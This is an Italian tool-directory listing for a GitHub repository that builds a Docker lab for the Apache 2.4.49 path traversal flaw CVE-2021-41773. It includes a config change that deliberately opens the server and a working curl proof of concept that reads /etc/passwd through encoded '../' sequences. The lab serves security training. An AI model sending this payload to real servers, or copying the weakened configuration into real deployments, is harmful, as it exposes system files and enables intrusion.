Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/jiyun02/cve-2021-41773
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Ambiente di laboratorio basato su Docker per la vulnerabilità di path traversal di Apache CVE-2021-41773 con exploit PoC e procedura dettagliata per test di sicurezza e formazione.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41773 – Rapporto Path Traversal di Apache


Riepilogo

  • Vulnerabilità trovata nella versione 2.4.49 di Apache HTTP Server che, a seconda della configurazione del server web, può esporre file sensibili del sistema tramite un attacco di Path Traversal
  • Path Traversal: un attaccante può accedere a file al di fuori della radice web utilizzando percorsi che includono ../

Informazioni

  • Nome della vulnerabilità: CVE-2021-41773
  • Versione interessata: Apache HTTP Server 2.4.49
  • Tipo di vulnerabilità: Path Traversal
  • Patch ufficiale: risolta dalla versione 2.4.50 in poi

Configurazione dell'ambiente di laboratorio

  • Immagine di base: 'httpd:2.4.49' (DockerHub)
  • Modalità di avvio del contenitore: Dockerfile + docker-compose.yml
  • Porta di esecuzione: 8080 → mappata sulla porta 80 del contenitore
  • Modifica configurazione Apache: impostato 'Require all granted' (per abilitare Path Traversal)

Come eseguire l'ambiente

  • git clone
https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

  • Proof of Concept (PoC) della vulnerabilità

    • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

    Procedimento dettagliato

    1. Esecuzione della directory di progetto image
    image
    1. Creazione del Dockerfile image

    -> Immagine di base: httpd:2.4.49 (versione vulnerabile)

    -> 'sed -i 's/Require all denied/Require all granted/g' : abilita Path Traversal e accesso esterno

    1. docker-compose.yml image

    -> Definizione di Apache

    -> Mappatura della porta 8080 alla porta 80 del contenitore

    1. Esecuzione di docker

      image
    2. Esecuzione del PoC

      image

    -> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

    -> /etc/passwd contiene informazioni sensibili; %2e è la codifica di .. che rappresenta il comando per spostarsi nella directory superiore

    -> Manipolando il percorso, il server accede a /etc/passwd e lo stampa

    1. Risultato dell'esecuzione image

    -> Come mostrato nell'immagine sopra, è possibile accedere a directory sensibili


    URL del repository accessibile tramite fork

    https://github.com/JIYUN02/cve-2021-41773 -> Esiste storico dei commit

    Scarica lo strumento